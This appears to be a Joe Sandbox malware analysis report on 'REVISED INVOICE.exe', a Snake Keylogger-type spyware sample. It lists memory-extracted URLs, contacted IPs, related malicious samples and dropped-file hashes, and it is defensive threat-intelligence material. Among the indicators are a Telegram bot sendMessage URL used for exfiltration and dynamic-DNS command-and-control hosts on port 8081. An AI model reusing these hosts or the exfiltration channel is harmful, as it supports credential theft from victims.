https://contoso.com/Icon | powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.usercontent.google.com/ | msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://checkip.dyndns.org | msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nsis.sf.net/NSIS_ErrorError | REVISED INVOICE.exe, REVISED INVOICE.exe.3.dr | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/favicon.ico | msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://aborters.duckdns.org:8081 | msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmp
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.google.com/sorry/indexmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26amsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.google.com/search?q=netmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://www.google.com/sorry/indextestmsiexec.exe, 00000005.00000002.629514463.00000000232EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023238000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023346000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002330E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023292000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002325A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://api.telegram.orgmsiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://reallyfreegeoip.org/xml/173.254.250.714msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | unknown | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
142.250.186.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
142.250.186.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
132.226.247.73 | unknown | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541088
Start date and time: 2024-10-24 12:00:55 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: REVISED INVOICE.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/16@28/8
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 115
• Number of non-executed functions: 105
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target msiexec.exe, PID 2504 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1960 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: REVISED INVOICE.exe
Time | Type | Description
06:01:56 | API Interceptor | 1x Sleep call for process: REVISED INVOICE.exe modified
06:01:57 | API Interceptor | 206x Sleep call for process: powershell.exe modified
06:02:59 | API Interceptor | 1394x Sleep call for process: msiexec.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          132.226.8.169SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Q110450 SV51179-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          149.154.167.220Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              188.114.97.3https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                              • aa.opencompanies.co.uk/vEXJm/
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • paste.ee/d/KXy1F
                                                                                              01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                              • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                              PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.freedietbuilder.online/nnla/
                                                                                              http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                              • onlinecheapflights.net/
                                                                                              Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                              • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                              request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                              • www.ergeneescortg.xyz/guou/
                                                                                              Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.thetahostthe.top/9r5x/
                                                                                              http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                              • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                              • servicetelemetryserver.shop/api/index.php
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              reallyfreegeoip.orgSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 188.114.97.3
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              checkip.dyndns.comSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 158.101.44.242
                                                                                              PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
api.telegram.org | Produccion.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | 226999705-124613-sanlccjavap0004-67.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | BT-036016002U_RFQ 014-010-02024.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | RFQ_64182MR_PDF.R00.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | Circular_no_088_Annexure_pdf.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | RTGS_UCB_DCCB_docx.html | malicious | HTMLPhisher | 149.154.167.220
api.telegram.org | WBPWLAj09q.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Adeleidae.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | rRFQNO-N__MERODOPEDIDO106673.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe | malicious | MassLogger RAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Produccion.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | 226999705-124613-sanlccjavap0004-67.exe | malicious | Snake Keylogger | 149.154.167.220
TELEGRAMRU | BT-036016002U_RFQ 014-010-02024.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | RFQ_64182MR_PDF.R00.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | Circular_no_088_Annexure_pdf.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | RTGS_UCB_DCCB_docx.html | malicious | HTMLPhisher | 149.154.167.220
TELEGRAMRU | WBPWLAj09q.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Adeleidae.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | rRFQNO-N__MERODOPEDIDO106673.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe | malicious | MassLogger RAT | 149.154.167.220
CLOUDFLARENETUS | SIPARIS-290124.PDF.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | PO 635614 635613_CQDM.html | malicious | HTMLPhisher | 104.21.68.211
CLOUDFLARENETUS | https://railrent-railrent.powerappsportals.com/ | malicious | Unknown | 172.67.140.116
CLOUDFLARENETUS | http://74.248.121.8/d/msdownload/update/software/defu/2024/10/updateplatform.amd64fre_d3f6f8300855e56b8ed00da6dac55a3c4cbf8c20.exe?cacheHostOrigin=au.download.windowsupdate.com | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://landsmith.ae/continue.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | mm.exe | malicious | Unknown | 172.67.177.220
CLOUDFLARENETUS | https://is.gd/6NgVrQ | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.53.8
CLOUDFLARENETUS | https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/ | malicious | Unknown | 172.67.4.35
CLOUDFLARENETUS | https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/ | malicious | Unknown | 104.22.21.209
UTMEMUS | SIPARIS-290124.PDF.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
UTMEMUS | Produccion.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
UTMEMUS | 080210232024.exe | malicious | MassLogger RAT | 132.226.247.73
UTMEMUS | WBPWLAj09q.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | Adeleidae.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
UTMEMUS | rRFQNO-N__MERODOPEDIDO106673.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
UTMEMUS | AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe | malicious | MassLogger RAT | 132.226.8.169
UTMEMUS | 69-33-600 Kreiselkammer ER3.vbs | malicious | GuLoader, Snake Keylogger | 132.226.247.73
UTMEMUS | InvoiceXCopy.xls | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | eFo07GvEf0.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | transferencia interbancaria_66579.xlam.xlsx | malicious | AgentTesla | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | Comprobante de pago.xlam.xlsx | malicious | Unknown | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | Orden de Compra No. 78986756565344657.xlam.xlsx | malicious | AgentTesla | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | Shipping Documents WMLREF115900.xls | malicious | Lokibot | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | A & C Metrology OC 5457144.xls | malicious | Unknown | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | #PO247762.docx | malicious | Remcos | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | PO NAHK22012FA000000.docx | malicious | Unknown | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | Logs.xls | malicious | Lokibot | 188.114.97.3
05af1f5ca1b87cc9cc9b25185115607d | InvoiceXCopy.xls | malicious | Snake Keylogger | 188.114.97.3
7dcce5b76c8b17472d024758970a406b | Shipping Documents WMLREF115900.xls | malicious | Lokibot | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | A & C Metrology OC 5457144.xls | malicious | Unknown | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | #PO247762.docx | malicious | Remcos | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | PO NAHK22012FA000000.docx | malicious | Unknown | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | Logs.xls | malicious | Lokibot | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | Inv No.248740.xls | malicious | Unknown | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | InvoiceXCopy.xls | malicious | Snake Keylogger | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | EX0096959.docx.doc | malicious | Remcos | 142.250.186.142, 142.250.186.97
7dcce5b76c8b17472d024758970a406b | Inv No.248730.xls | malicious | Unknown | 142.250.186.142, 142.250.186.97
36f7277af969a6947a61ae0b815907a1 | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | BL Packing List & Invoice.xls | malicious | Unknown | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | mnobizx.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | Quotation Botisk 1475-HIRSCH Technik,____________________________________________.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | quotation list 1.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | Scanned Copy.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
36f7277af969a6947a61ae0b815907a1 | na.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 7837
Entropy (8bit): 4.813557972296841
Encrypted: false
SSDEEP: 192:bxoe5uVsm5emdwVFn3eGOVpN6K3bkkjo5zgkjDt4iWN3yBGHVbdcU6COOuOBn:kkVoGIpN6KQkj2skjh4iUxoOdBn
MD5: 79DC2D6859D68F13A7B81B39AA6046E9
SHA1: 68218BA47682E82C9E74176FDA6E7DE1525FE7E4
SHA-256: BAD4B8119FA526EE766BFBA3B4B62EB94B94CC4FBF3765C1DE09830F722630F5
SHA-512: 058B564F841705DF16958C3911C2011AEC47131445E8BE416BB190620F664453DA54C3D02459192E0E6FADC27C8387DE9A3E7625BFA939B75DC640E27F2278D0
Malicious: false
Reputation: low
Preview: PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
